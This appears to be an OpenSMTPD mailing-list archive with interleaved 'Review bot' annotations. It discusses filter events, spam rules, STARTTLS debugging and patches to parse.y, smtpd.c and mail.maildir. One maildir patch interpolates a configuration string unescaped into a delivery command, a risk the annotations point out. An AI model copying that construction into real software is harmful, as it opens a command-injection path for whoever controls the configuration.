> > So in case one wants to reject a session based only on reporting events,
> > one still has to wait till the filter events start coming in. Or one
> > could write a built-in like fcrdns. Is this correct?
> >  
>
> To reject a session based only on reporting events, you should subscribe
> to the relevant events in order to gather the info you want, then to one
> filter event to actually perform the action of rejecting.
>
> For example, I could subscribe to tx-connect, tx-helo and tx-ehlo to get
> source address, rdns, fcrdns and helo name from reporting events, but to
> reject the session based on this information I must decide when I want a
> rejection (do i want to reject at MAIL FROM ? RCPT TO ? DATA ? COMMIT ?)
> and register for appropriate filter event to actually reject a session.
>
> Builtin filters are a bit special because we are going to be VERY, VERY,
> VERY selective about them. Anything that can be done with a builtin, can
> be done with a proc filter and proc filters don't run in the same memory
> space so ... a good approach is to write a proc filter and if we find it
> makes sense to convert to a builtin, it can be discussed.
>
>
> > > > 3) Are there time limits for a filter to return response?
> > > >
> > > 
> > > time limits are not implemented yet, but yes there will be a time limit,
> > > very likely related to the SMTP session timeouts.
> > > 
> > > it's not tricky to implement, it'll be a notification sent to the filter
> > > that the last query timed-out and it shouldn't respond anymore.
> > > 
> > > this will result in a Temporary Failure in the SMTP session, filters are
> > > not allowed to exceed that timeout.
> > 
> > So if in a chain {f1,f2,f3}, if f2 takes too much time to respond, both
> > f1 and f3 will be notified of the session timeout.
> > 
>
> yes, definitely.
>
> in filter chains, all filters always receive all _reporting_ events.
>
> this is a reason why report and filters are separate, if you look at the
> connect phase, all filters will receive the tx-connect report event THEN
> the connect filter event is triggered and all filters may not receive it
> because first filter may reject. if it rejects, then the reporting event
> tx-disconnected is sent to all filters.
>
> the action of a filter will never prevent all filters from receiving the
> report events.
>
>
> > > > 5) Could we have the filter builtin for helo be different from the
> > > > ehlo? It might be instructional to understand that the client asked
> > > > for ehlo.
> > > > { FILTER_EHLO, "ehlo", filter_builtins_helo },
> > > 
> > > it is already the case, helo and ehlo are different filter hooks:
> > > 
> > >    filter foo1 builtin helo [...]
> > >    filter foo1 builtin ehlo [...]
> > > 
> > > the same applies for proc filters, they can subscribe to helo and ehlo
> > > as different filtering events.
> > 
> > I may be wrong here, but I was unable to find a filter_builtins_ehlo in
> > the code. From lka_filter.c
> > ..
> > static int filter_builtins_notimpl(struct filter_session *, struct filter 
> > *, uint64_t, const char *);
> > static int filter_builtins_connect(struct filter_session *, struct filter 
> > *, uint64_t, const char *);
> > static int filter_builtins_helo(struct filter_session *, struct filter *, 
> > uint64_t, const char *);
> > static int filter_builtins_mail_from(struct filter_session *, struct filter 
> > *, uint64_t, const char *);
> > static int filter_builtins_rcpt_to(struct filter_session *, struct filter 
> > *, uint64_t, const char *);
> > ..
> > { FILTER_CONNECT, "connect", filter_builtins_connect },
> > { FILTER_HELO, "helo", filter_builtins_helo },
> > { FILTER_EHLO, "ehlo", filter_builtins_helo },
> > { FILTER_STARTTLS, "starttls", filter_builtins_notimpl },
> > ..
> > 
>
> yes, the same implementation of the builtin is used so I 

Re: Rule to prevent spam from my domain

2018-12-19 Thread Edgar Pettijohn
On Wed, Dec 19, 2018 at 11:37:31PM +, Mik J wrote:
> Hello,
> 
> I have written rules for my opensmtpd but some spams are passing through.
> 
> The ones that I go through have a source like em...@mydomain.org and are sent 
> to i...@mydomain.org
> I'm wondering if some of you have written this kind of rule ?
> 
> reject from source ! sender  for domain 
> 
> 
> Regards

Please provide your /etc/mail/smtpd.conf

And perhaps some logs where the spammers are getting through.

You shouldn't allow your server to be used as a relay without authentication.

Edgar




Re: Issues with Thunderbird and STARTTLS (Pipelining not supported)

2018-12-17 Thread Edgar Pettijohn

On Dec 17, 2018 6:49 AM, Matt Schwartz  wrote:
>
> Right off the bat, I think the mask-src might be causing a problem. I know that Thunderbird does some weird stuff and it doesn't play well with OpenSMTPD's correct implementation of smtps but you're using starttls. So instead of mask-src, try using the hostname parameter and set it to the hostname that you want to use.
>
> On Mon, Dec 17, 2018, 7:31 AM mabi 
>>
>> Right, I forgot that sorry. Here it is:
>>
>> pki mail.mydomain.org cert "/etc/ssl/mail.mydomain.org.crt"
>> pki mail.mydomain.org key "/etc/ssl/private/mail.mydomain.org.key"
>>
>> table aliases file:/etc/mail/aliases
>> table domains postgres:/etc/mail/postgresql.conf
>> table virtuals postgres:/etc/mail/postgresql.conf
>> table credentials postgres:/etc/mail/postgresql.conf
>>
>> listen on egress port 25  hostname mail.mydomain.org tls pki mail.mydomain.org
>> listen on egress port 587 hostname mail.mydomain.org tls-require pki mail.mydomain.org auth  mask-src
>>
>> action "local" mbox alias 
>> action "relay" relay
>> action "lmtp_dovecot" lmtp "/var/dovecot/lmtp" rcpt-to virtual 
>>
>> match for local action "local"
>> match from any for domain  action "lmtp_dovecot"
>> match auth from any for any action "relay"
>>
>>
>>
>> ‐‐‐ Original Message ‐‐‐
>> On Monday, December 17, 2018 1:21 PM, Matt Schwartz  wrote:
>>
>>> Please share your smtpd.conf file. OpenSMTPD 6.4.1 works just fine with Thunderbird.
>>>
>>> On Mon, Dec 17, 2018, 7:16 AM mabi 

 Hi,

 I just configured OpenSMTPD on OpenBSD 6.4 with authentication to send mails as a MSA (port 587). I did some tests with swaks and TLS enabled and it works fine but with Thunderbird it miserably fails to use STARTTLS. On the server side I get:

 500 5.5.1 Invalid command: Pipelining not supported

 Is Thunderbird somehow so broken that it doesn't even respect that OpenSMTPD does not support SMTP pipelining?

 I am using Thunderbird 60.3.0...

 Any workarounds?

 Also I was wondering if OpenSMTPD supports other authentication types additionally to PLAIN and LOGIN?

 Regards,
 Mabi








>>
I recently had a typo causing the wrong pki certs to be used and for some reason the logs were complaining about pipelining. Perhaps test with openssl s_client if the certs could potentially be the problem.
Edgar


Re: FAQ gone?

2018-12-12 Thread Edgar Pettijohn
I feel the manual pages are really enough. However, some sort of wiki that
the userbase could keep updated without intervention may work out.

Edgar




Re: parse.y patch

2018-12-03 Thread Edgar Pettijohn

On Dec 3, 2018 3:57 AM, Gilles Chehade  wrote:
>
> On Sun, Dec 02, 2018 at 07:02:14PM -0600, Edgar Pettijohn wrote:
> > I think this was probably an oversight.
> > 
>
> no, this wasn't an oversight.
>
> the new grammar used TAG, not TAGGED which will be removed
>

:( Tagged reads better. No worries though. I saw the TAGGED keyword still there 
so I was hoping it was accidental.

>
> > Index: parse.y
> > ===
> > RCS file: /cvs/src/usr.sbin/smtpd/parse.y,v
> > retrieving revision 1.232
> > diff -u -p -u -r1.232 parse.y
> > --- parse.y 30 Nov 2018 15:33:40 - 1.232
> > +++ parse.y 3 Dec 2018 01:00:45 -
> > @@ -921,7 +921,7 @@ ACTION STRING {
> >  ;
> >  
> >  match_option:
> > -negation TAG tables {
> > +negation TAGGED tables {
> >  struct table   *t = $3;
> >  
> >  if (rule->flag_tag) {
> > 
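Review bot: The `+negation TAGGED tables {` line rewires `match_option` to a keyword that, per the reply above, is the one scheduled for removal, so this hunk moves the grammar in the opposite direction from the one the maintainer describes. Since the message notes that the TAGGED keyword is still present, the follow-up that fits the stated plan is a diff deleting that leftover keyword, not one that starts using it in this production.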
> > 
>
> -- 
> Gilles Chehade    @poolpOrg
>
> https://www.poolp.org tip me: https://paypal.me/poolpOrg

Re: parse.y patch + smtpd.conf.5 patch

2018-12-02 Thread Edgar Pettijohn
I guess I should have included the smtpd.conf(5) patch as well. 
Plus remove trailing whitespace.

Index: smtpd.conf.5
===
RCS file: /cvs/src/usr.sbin/smtpd/smtpd.conf.5,v
retrieving revision 1.206
diff -u -p -u -r1.206 smtpd.conf.5
--- smtpd.conf.58 Oct 2018 06:10:17 -   1.206
+++ smtpd.conf.53 Dec 2018 03:08:02 -
@@ -269,7 +269,7 @@ Server certificates for those protocols 
 Require TLS to be used when relaying, using mandatory STARTTLS by default.
 When used with a smarthost, the protocol must not be
 .Dq smtp+notls:// .
-If 
+If
 .Op no-verify
 is specified, do not require a valid certificate.
 .It Cm auth Pf < Ar table Ns >
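Review bot: The `-If ` / `+If` pair in this hunk is a trailing-whitespace cleanup that has nothing to do with the keyword rename in the next hunk. Send it as a separate diff so the `tag`/`tagged` change can be reviewed, accepted or reverted on its own.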
@@ -540,7 +540,7 @@ Specify that transaction's RCPT TO shoul
 .Ar recipient .
 .It Xo
 .Op Ic \&!
-.Cm tag Ar tag
+.Cm tagged Ar tag
 .Xc
 Matches transactions tagged with the given
 .Ar tag .
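Review bot: `.Cm tagged Ar tag` documents only a literal tag argument, while the parse.y hunk quoted in the same mail changes the production that takes a table (`negation TAGGED tables`), and that table form is not described in this entry. Document the table variant next to it, and because the `tag` spelling disappears from the page with this change, state whether it is still accepted by the parser.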

On Sun, Dec 02, 2018 at 07:02:14PM -0600, Edgar Pettijohn wrote:
> I think this was probably an oversight.
> 
> Index: parse.y
> ===
> RCS file: /cvs/src/usr.sbin/smtpd/parse.y,v
> retrieving revision 1.232
> diff -u -p -u -r1.232 parse.y
> --- parse.y   30 Nov 2018 15:33:40 -  1.232
> +++ parse.y   3 Dec 2018 01:00:45 -
> @@ -921,7 +921,7 @@ ACTION STRING {
>  ;
>  
>  match_option:
> -negation TAG tables {
> +negation TAGGED tables {
>   struct table   *t = $3;
>  
>   if (rule->flag_tag) {
> 
> 




parse.y patch

2018-12-02 Thread Edgar Pettijohn
I think this was probably an oversight.

Index: parse.y
===
RCS file: /cvs/src/usr.sbin/smtpd/parse.y,v
retrieving revision 1.232
diff -u -p -u -r1.232 parse.y
--- parse.y 30 Nov 2018 15:33:40 -  1.232
+++ parse.y 3 Dec 2018 01:00:45 -
@@ -921,7 +921,7 @@ ACTION STRING {
 ;
 
 match_option:
-negation TAG tables {
+negation TAGGED tables {
struct table   *t = $3;
 
if (rule->flag_tag) {
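Review bot: In `match_option`, the `TAG` token is replaced rather than `TAGGED` being added as an alternative, so a configuration written with `tag` and a table no longer matches this production. The message gives no reason beyond "probably an oversight"; say which spelling is meant to be canonical, and if both should parse, add a second `negation TAGGED tables` alternative instead of editing the existing line.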




Re: Mail loops when relaying and using smtp auth

2018-11-28 Thread Edgar Pettijohn
I think the full config minus pki stuff would be useful. Till then look at 
tags. It may be useful. 

listen on 587 auth ... tag authed

accept tagged authed ...
On Nov 28, 2018 5:32 PM, Thomas Smith  wrote:
>
> Hi,
>
> I’m running OpenSMTPd on OpenBSD 6.3.
>
> The server is used primarily as a mail filtering relay, filtering with spamd; 
> however, it’s also used, on a more limited basis, to send outbound emails.
>
> If I’m only relaying email for domain.com, relaying works fine. In this 
> context, an external user would send an email to u...@domain.com, that email 
> would pass through this server first, then it would be delivered upstream.
>
> It’s this second context that causes issues…
>
> If user1 attempts to send an outbound email through this server—that is, 
> user1 is authenticating to this server for the sole purpose of sending an 
> email—and sends that email to u...@domain.com, I end up with a mail loop 
> since the server itself is listed as the MX for domain.com.
>
> My question is this…
>
> Is it possible to configure OpenSMTPd to detect this scenario and to know 
> that it should relay that email to domain.com rather than trying to deliver 
> it to its MX server, which happens to be the server itself?
>
> Here’s a very abridged version of my config, showing the relay and 
> authentication configurations:
>
> accept from any for domain  relay via  # relay config
> listen on egress port 587 tls-require auth  hostname 
> $smtp_domain pki $smtp_domain # outbound smtp auth config
>
> If the answer to my question is that this isn’t possible, can someone 
> recommend an alternative way of configuring OpenSMTPd to make it work? The 
> objective would be to provide both of these services on the same server, 
> instead of separate servers.
>
> Thank you,
>
> ~ Tom
>
>


Re: mail.maildir junk patches

2018-11-25 Thread Edgar Pettijohn

On Nov 25, 2018 8:24 AM, Gilles Chehade  wrote:
>
> There seems to be something wrong with your mail encoding, the diff is
> barely readable for me, spaces are replaced with '?' :-/
>
Damn you Thunderbird!
> I'm wondering if we couldn't just test 'X-Spam' and 'X-Spam-Flag'.
>
> I don't really see value in adding the header to check in grammar then
> passing it to the mda when the Junk case is very isolated and can
> be covered with a couple strcasecmp() calls.
>
> If X-Spam-Flag had been part of the junk test in mail.maildir.c, would
> this diff still have been written ? to cover which case ?
>
> Gilles
>
I had considered this also, then thought there may be other unknown cases that 
this would cover in advance. I will rewrite and resend.
>
> On Sat, Nov 24, 2018 at 11:02:41AM -0600, Edgar Pettijohn III wrote:
> > make the junk header customizable like so:
> > 
> > action "local" maildir junk "X-Spam-Flag: YES"
> > 
> > 
> > Index: mail.maildir.8
> > ===
> > RCS file: /cvs/src/usr.sbin/smtpd/mail.maildir.8,v
> > retrieving revision 1.5
> > diff -u -p -u -r1.5 mail.maildir.8
> > --- mail.maildir.8?? 30 May 2018 12:37:57 -?? 1.5
> > +++ mail.maildir.8?? 24 Nov 2018 16:58:03 -
> > @@ -22,7 +22,7 @@
> > ??.Nd store mail in a maildir
> > ??.Sh SYNOPSIS
> > ??.Nm mail.maildir
> > -.Op Fl j
> > +.Op Fl j header
> > ??.Op Ar pathname
> > ??.Sh DESCRIPTION
> > ??.Nm
> > @@ -36,7 +36,9 @@ located in the user's home directory.
> > ??The options are as follows:
> > ??.Bl -tag -width Ds
> > ??.It Fl j
> > -Scan message for X-Spam and move to Junk folder if result is positive.
> > +Scan message for
> > +.Ar header
> > +and move to Junk folder if result is positive.
> > ??.El
> > ??.Sh EXIT STATUS
> > ??.Ex -std mail.maildir
> > Index: mail.maildir.c
> > ===
> > RCS file: /cvs/src/usr.sbin/smtpd/mail.maildir.c,v
> > retrieving revision 1.7
> > diff -u -p -u -r1.7 mail.maildir.c
> > --- mail.maildir.c?? 24 Oct 2018 19:26:23 -?? 1.7
> > +++ mail.maildir.c?? 24 Nov 2018 16:58:03 -
> > @@ -37,23 +37,25 @@
> > 
> > ??static int?? maildir_subdir(const char *, char *, size_t);
> > ??static void?? maildir_mkdirs(const char *);
> > -static void?? maildir_engine(const char *, int);
> > +static void?? maildir_engine(const char *, int, const char *);
> > ??static int?? mkdirs_component(const char *, mode_t);
> > ??static int?? mkdirs(const char *, mode_t);
> > 
> > ??int
> > ??main(int argc, char *argv[])
> > ??{
> > -?? int?? ch;
> > -?? int?? junk = 0;
> > +?? int?? ??ch;
> > +?? int?? ??junk = 0;
> > +?? char?? *header = NULL;
> > 
> >  if (! geteuid())
> >  ?? errx(1, "mail.maildir: may not be executed as root");
> > 
> > -?? while ((ch = getopt(argc, argv, "j")) != -1) {
> > +?? while ((ch = getopt(argc, argv, "j:")) != -1) {
> >  ?? switch (ch) {
> >  ?? case 'j':
> >  ?? ?? junk = 1;
> > +?? ?? ?? header = optarg;
> >  ?? ?? break;
> >  ?? default:
> >  ?? ?? break;
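Review bot: Changing the getopt string from "j" to "j:" makes the argument mandatory, so an existing invocation of the form `mail.maildir -j pathname` now consumes `pathname` as the header and leaves no pathname argument for `maildir_engine(argv[0], ...)`. Either keep `-j` argument-free with its current X-Spam test and add a separate option for a custom header, or fall back to "X-Spam: yes" when no header is supplied.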
> > @@ -65,7 +67,7 @@ main(int argc, char *argv[])
> >  if (argc > 1)
> >  ?? errx(1, "mail.maildir: only one maildir is allowed");
> > 
> > -?? maildir_engine(argv[0], junk);
> > +?? maildir_engine(argv[0], junk, header);
> > 
> >  return (0);
> > ??}
> > @@ -107,7 +109,7 @@ maildir_mkdirs(const char *dirname)
> > ??}
> > 
> > ??static void
> > -maildir_engine(const char *dirname, int junk)
> > +maildir_engine(const char *dirname, int junk, const char *header)
> > ??{
> >  char?? rootpath[PATH_MAX];
> >  char?? junkpath[PATH_MAX];
> > @@ -182,7 +184,7 @@ maildir_engine(const char *dirname, int
> >  ?? line[strcspn(line, "\n")] = '\0';
> >  ?? if (line[0] == '\0')
> >  ?? ?? in_hdr = 0;
> > -?? ?? if (junk && in_hdr && strcmp(line, "X-Spam: yes") == 0)
> > +?? ?? if (junk && in_hdr && strcmp(line, header) == 0)
> >  ?? ?? is_junk = 1;
> > 

smtpd.c patch

2018-11-24 Thread Edgar Pettijohn III

pledge flock doesn't seem necessary any longer?

Index: smtpd.c
===
RCS file: /cvs/src/usr.sbin/smtpd/smtpd.c,v
retrieving revision 1.306
diff -u -p -u -r1.306 smtpd.c
--- smtpd.c    16 Nov 2018 20:55:59 -    1.306
+++ smtpd.c    25 Nov 2018 02:02:57 -
@@ -1070,8 +1070,8 @@ smtpd(void) {

 purge_task();

-    if (pledge("stdio rpath wpath cpath fattr flock tmppath "
-        "getpw sendfd proc exec id inet unix", NULL) == -1)
+    if (pledge("stdio rpath wpath cpath fattr tmppath getpw "
+        "sendfd proc exec id inet unix", NULL) == -1)
     err(1, "pledge");

 event_dispatch();
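Review bot: Dropping `flock` from the promise string is backed only by a question in the message ("doesn't seem necessary any longer?"); nothing in the diff shows that the code reached from `event_dispatch()` after this `pledge()` call has stopped locking files. The promise covers flock(2), lockf(3), fcntl(2) locking and open(2) with O_SHLOCK or O_EXLOCK, and a violation kills the process, so name the change that removed the last such call in this process or the test that ran under the reduced set. Rewrapping the string also moves `getpw` up a line, which hides the one-word removal; keep the original line break.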





Re: tls debugging

2018-11-24 Thread Edgar Pettijohn III



On 11/22/18 1:11 AM, Gilles Chehade wrote:
> On Tue, Nov 13, 2018 at 09:59:29PM -0600, Edgar Pettijohn III wrote:
> > I have the following line on my laptop's smtpd.conf:
> >
> > action "relay" relay host "smtp+tls//label@domain:587" auth  tls no-verify
> >
> > I had to add the no-verify for some reason with the upgrade to 6.4. I was
> > trying to figure out why tls was failing, so I started testing with openssl
> > s_client and it wasn't being very useful. I looked at the logs on the server
> > and this is what it shows:
> >
> > Nov 13 21:47:40 mail smtpd[37181]: bee1391f24a23978 smtp failed-command
> > address=50.55.65.87 host=50.55.65.87 command="pipelining" result="500 5.5.1
> > Invalid command: Command unrecognized"
> > Nov 13 21:47:50 mail smtpd[37181]: bee1391f24a23978 smtp disconnected
> > address=50.55.65.87 host=50.55.65.87 reason=disconnect
> >
> > I'm not sure if this is an smtpd bug or an s_client bug or neither.
>
> without the command line you used, i can only take guesses.
>
> the sample config line you show hints that the host you're connecting to
> supports TLS through the STARTTLS extension so you have to establish the
> connection using plain SMTP then upgrade to TLS.
>
> the pipelining error hints that the SMTP protocol was not respected when
> your client connected, which makes me assume you didn't connect in plain
> and upgrade to TLS but you connected and issued a TLS negotiation out of
> the blue (aka. SMTPS).
>
> so I guess you used something like:
>
>    $ openssl s_client -host 50.55.65.87 -port 587
>
> instead of:
>
>    $ openssl s_client -host 50.55.65.87 -port 587 -starttls smtp

Yep I forgot -starttls smtp :)
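
The distinction drawn in the reply above, as an added example that is not part of the original thread: a STARTTLS port greets first in plain SMTP and advertises STARTTLS, while an SMTPS-style listener stays silent until it receives a TLS ClientHello. The probe classifies an already-connected socket; the fake server, the host names and the socketpair harness are constructed so that it runs offline.

```python
import socket
import threading

def read_reply(rfile):
    """Read one SMTP reply (possibly multi-line); return (code, texts)."""
    texts = []
    while True:
        line = rfile.readline().rstrip(b"\r\n")
        if not line:
            raise ConnectionError("peer closed mid-reply")
        texts.append(line[4:].decode("ascii", "replace"))
        if line[3:4] != b"-":              # "250-" continues, "250 " ends
            return int(line[:3]), texts

def probe_tls_mode(sock, timeout=1.0):
    """Return 'starttls', 'plain-only', 'implicit-tls' or 'not-smtp'."""
    sock.settimeout(timeout)
    rfile = sock.makefile("rb")
    try:
        code, _ = read_reply(rfile)        # a plain-SMTP server greets first
    except socket.timeout:
        return "implicit-tls"              # silent: likely awaiting a ClientHello
    except (ValueError, ConnectionError):
        return "not-smtp"
    if code != 220:
        return "not-smtp"
    sock.sendall(b"EHLO probe.example\r\n")
    code, caps = read_reply(rfile)
    offered = any(c.upper().split()[:1] == ["STARTTLS"] for c in caps[1:])
    return "starttls" if code == 250 and offered else "plain-only"

def fake_starttls_server(sock):            # constructed stand-in, not a real server
    sock.sendall(b"220 mail.example ESMTP\r\n")
    sock.recv(1024)                        # the probe's EHLO line
    sock.sendall(b"250-mail.example Hello\r\n250-STARTTLS\r\n250 HELP\r\n")

def demo():
    a, b = socket.socketpair()             # offline: no network involved
    with a, b:
        t = threading.Thread(target=fake_starttls_server, args=(b,))
        t.start()
        plain_first = probe_tls_mode(a)
        t.join()
    a, b = socket.socketpair()
    with a, b:                             # peer never speaks, like an SMTPS port
        silent = probe_tls_mode(a, timeout=0.3)
    return {"plain-first": plain_first, "silent": silent}

if __name__ == "__main__":
    print(demo())
```

A 'starttls' result means the s_client invocation needs -starttls smtp, and 'implicit-tls' means it must be left out. A server that deliberately delays its banner also looks silent, so raise the timeout before trusting an 'implicit-tls' result.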




mail.maildir junk patches

2018-11-24 Thread Edgar Pettijohn III

make the junk header customizable like so:

action "local" maildir junk "X-Spam-Flag: YES"


Index: mail.maildir.8
===
RCS file: /cvs/src/usr.sbin/smtpd/mail.maildir.8,v
retrieving revision 1.5
diff -u -p -u -r1.5 mail.maildir.8
--- mail.maildir.8    30 May 2018 12:37:57 -    1.5
+++ mail.maildir.8    24 Nov 2018 16:58:03 -
@@ -22,7 +22,7 @@
 .Nd store mail in a maildir
 .Sh SYNOPSIS
 .Nm mail.maildir
-.Op Fl j
+.Op Fl j header
 .Op Ar pathname
 .Sh DESCRIPTION
 .Nm
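
Review bot: in the SYNOPSIS line .Op Fl j header the new word has no macro of its own, so it is parsed as a further argument to Fl and shown as a second flag instead of as an argument. The DESCRIPTION hunk already uses .Ar header; the synopsis should read .Op Fl j Ar header to match.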
@@ -36,7 +36,9 @@ located in the user's home directory.
 The options are as follows:
 .Bl -tag -width Ds
 .It Fl j
-Scan message for X-Spam and move to Junk folder if result is positive.
+Scan message for
+.Ar header
+and move to Junk folder if result is positive.
 .El
 .Sh EXIT STATUS
 .Ex -std mail.maildir
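
Review bot: the item tag is still .It Fl j although the option now takes an argument; make it .It Fl j Ar header. The description should also state what "positive" means now: the code compares a whole header line with strcmp, so the text should say the line must match exactly as given, including case, and show an example value such as the X-Spam-Flag: YES used in the cover note.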
Index: mail.maildir.c
===
RCS file: /cvs/src/usr.sbin/smtpd/mail.maildir.c,v
retrieving revision 1.7
diff -u -p -u -r1.7 mail.maildir.c
--- mail.maildir.c    24 Oct 2018 19:26:23 -    1.7
+++ mail.maildir.c    24 Nov 2018 16:58:03 -
@@ -37,23 +37,25 @@

 static int    maildir_subdir(const char *, char *, size_t);
 static void    maildir_mkdirs(const char *);
-static void    maildir_engine(const char *, int);
+static void    maildir_engine(const char *, int, const char *);
 static int    mkdirs_component(const char *, mode_t);
 static int    mkdirs(const char *, mode_t);

 int
 main(int argc, char *argv[])
 {
-    int    ch;
-    int    junk = 0;
+    int     ch;
+    int     junk = 0;
+    char    *header = NULL;

 if (! geteuid())
     errx(1, "mail.maildir: may not be executed as root");

-    while ((ch = getopt(argc, argv, "j")) != -1) {
+    while ((ch = getopt(argc, argv, "j:")) != -1) {
     switch (ch) {
     case 'j':
         junk = 1;
+            header = optarg;
         break;
     default:
         break;
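
Review bot: changing the optstring to "j:" makes the argument mandatory, so an existing invocation of the form mail.maildir -j pathname now takes the pathname as the header and is left with no pathname argument, without any error. Either keep a bare -j working with the old X-Spam: yes default (a separate option letter for the header would do it) or reject the old form explicitly. header = optarg is also stored unchecked, so an empty string is accepted even though it can never match inside the header block. The re-indentation of ch and junk is whitespace-only and could be dropped from the patch.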
@@ -65,7 +67,7 @@ main(int argc, char *argv[])
 if (argc > 1)
     errx(1, "mail.maildir: only one maildir is allowed");

-    maildir_engine(argv[0], junk);
+    maildir_engine(argv[0], junk, header);

 return (0);
 }
@@ -107,7 +109,7 @@ maildir_mkdirs(const char *dirname)
 }

 static void
-maildir_engine(const char *dirname, int junk)
+maildir_engine(const char *dirname, int junk, const char *header)
 {
 char    rootpath[PATH_MAX];
 char    junkpath[PATH_MAX];
@@ -182,7 +184,7 @@ maildir_engine(const char *dirname, int
     line[strcspn(line, "\n")] = '\0';
     if (line[0] == '\0')
         in_hdr = 0;
-        if (junk && in_hdr && strcmp(line, "X-Spam: yes") == 0)
+        if (junk && in_hdr && strcmp(line, header) == 0)
         is_junk = 1;
     fprintf(fp, "%s\n", line);
 }
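
Review bot: strcmp(line, header) is an exact, case-sensitive comparison of the whole line, which was adequate for one hard-coded string but is fragile for a user-supplied one: header field names are case-insensitive, and a different capitalisation of the value or trailing whitespace defeats the match, so tagged mail is delivered to the inbox with no indication why. Consider comparing at least the field name case-insensitively and documenting exactly what is matched. Also, header is NULL whenever -j was not given; the junk && short-circuit keeps that safe here, but it relies on junk and header always being set together, which testing header != NULL instead of a separate flag would make explicit.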
Index: smtpd.conf.5
===
RCS file: /cvs/src/usr.sbin/smtpd/smtpd.conf.5,v
retrieving revision 1.206
diff -u -p -u -r1.206 smtpd.conf.5
--- smtpd.conf.5    8 Oct 2018 06:10:17 -    1.206
+++ smtpd.conf.5    24 Nov 2018 16:58:03 -
@@ -128,7 +128,7 @@ Optionally,
 might be specified to use the
 recipient email address (after expansion) instead of the
 local user in the LMTP session as RCPT TO.
-.It Cm maildir Op Ar pathname Op Cm junk
+.It Cm maildir Op Ar pathname Op Cm junk header
 Deliver the message to the maildir in
 .Ar pathname
 if specified, or by default to
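
Review bot: in .It Cm maildir Op Ar pathname Op Cm junk header the new word inherits Cm and is rendered as a literal keyword; it is a user-supplied value and should be marked up as Ar header, matching the .Ar header used in the paragraph changed in the next hunk. As written the header is mandatory after junk, so if dropping the bare junk form is intended the text should say so.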
@@ -142,7 +142,8 @@ may contain format specifiers that are e
 If the
 .Cm junk
 argument is provided, the message will be moved to the Junk
-folder if it contains a positive X-Spam header.
+folder if it contains a positive match for the provided
+.Ar header .
 .It Cm mbox
 Deliver the message to the user's mbox with
 .Xr mail.local 8 .
Index: parse.y
===
RCS file: /cvs/src/usr.sbin/smtpd/parse.y,v
retrieving revision 1.230
diff -u -p -u -r1.230 parse.y
--- parse.y    8 Nov 2018 13:24:22 -    1.230
+++ parse.y    24 Nov 2018 16:58:04 -
@@ -662,8 +662,8 @@ MBOX {
 | MAILDIR {
 asprintf(>u.local.command, "/usr/libexec/mail.maildir");
 } dispatcher_local_options
-| MAILDIR JUNK {
-    asprintf(>u.local.command, "/usr/libexec/mail.maildir -j");
+| MAILDIR JUNK STRING {
+    asprintf(>u.local.command, "/usr/libexec/mail.maildir 
-j \"%s\"", $3);

 } dispatcher_local_options
 | MAILDIR STRING {
 if (strncmp($2, "~/", 2) == 0)
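
Review bot: $3 is copied from the configuration straight into the command string between \"...\" with no escaping, so a header value that contains a double quote, or anything else special to whatever later splits or executes u.local.command, changes how the command line is parsed. Validate the string in this rule (for example, accept only a printable "name: value" form and reject double quotes, backslashes, $, backticks and newlines) and fail the parse with an error otherwise. This rule also replaces the bare MAILDIR JUNK form instead of adding to it, so existing configurations that say maildir junk stop parsing after an upgrade.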
@@ -673,13 +673,13 @@ MBOX {
     asprintf(>u.local.command,
         "/usr/libexec/mail.maildir \"%s\"", $2);
 } dispatcher_local_options
-| MAILDIR STRING JUNK {
+| MAILDIR STRING JUNK STRING{
 if (strncmp($2, "~/", 2) == 0)
     asprintf(>u.local.command,
-            "/usr/libexec/mail.maildir -j \"%%{user.directory}/%s\"", 
$2+2);
+            "/usr/libexec/mail.maildir -j \"%s\" 
\"%%{user.directory}/%s\"", $4, $2+2);

 else
     asprintf(>u.local.command,
-            
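
Review bot: the rule header MAILDIR STRING JUNK STRING{ is missing the space before the brace that the neighbouring rules have. The same unescaped interpolation as in the previous rule applies here to $4, now next to the already quoted pathname, so whatever validation is added for the header string should cover both rules, ideally through one shared helper.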

Re: Spam, SPF check and SRS?

2018-11-14 Thread Edgar Pettijohn

On Nov 14, 2018 1:28 PM, Henry Jensen  wrote:
>
> Hi,
>
> new OpenSMTPD user here. I did (and still do) administrate Debian with Exim for several years and wanted to try something different. 
>
> So I got myself a server with OpenBSD and OpenSMTPD.
>
> So far I am impressed that a fully functional and secure SMTP server can be configured with such a small config file:) Congrats to the devs.
>
> Now that basic functionality is accomplished I want to try more. Of course I found config snippets here and there, but I think some parts of the puzzle are still missing and I still can't see the whole picture. Additionally most of the examples online are in the old syntax format.
>
> 1. Spam checking: I know there are solutions which do include spamd, SpamAssassin and pf. What's the best practice and what about rspamd?
>

Once the filtering code gets committed I think we will have endless possibilities for spam checking.

> 2. SPF checking: I think, this should also be done by the spam filter?
>

See above.

> 3. Sender Rewriting Scheme (SRS): SPF is breaking mail forwarding in some cases, and the solution to this is SRS. How can this be done with OpenSMTPD?
>

I don't know. :(

Edgar

> Kind regards,
>
> Henry
>
>
>



tls debugging

2018-11-13 Thread Edgar Pettijohn III

I have the following line on my laptop's smtpd.conf:

action "relay" relay host "smtp+tls//label@domain:587" auth  tls no-verify


I had to add the no-verify for some reason with the upgrade to 6.4. I 
was trying to figure out why tls was failing, so I started testing with 
openssl s_client and it wasn't being very useful. I looked at the logs 
on the server and this is what it shows:


Nov 13 21:47:40 mail smtpd[37181]: bee1391f24a23978 smtp failed-command 
address=50.55.65.87 host=50.55.65.87 command="pipelining" result="500 
5.5.1 Invalid command: Command unrecognized"
Nov 13 21:47:50 mail smtpd[37181]: bee1391f24a23978 smtp disconnected 
address=50.55.65.87 host=50.55.65.87 reason=disconnect


I'm not sure if this is an smtpd bug or an s_client bug or neither.


Thanks,


Edgar




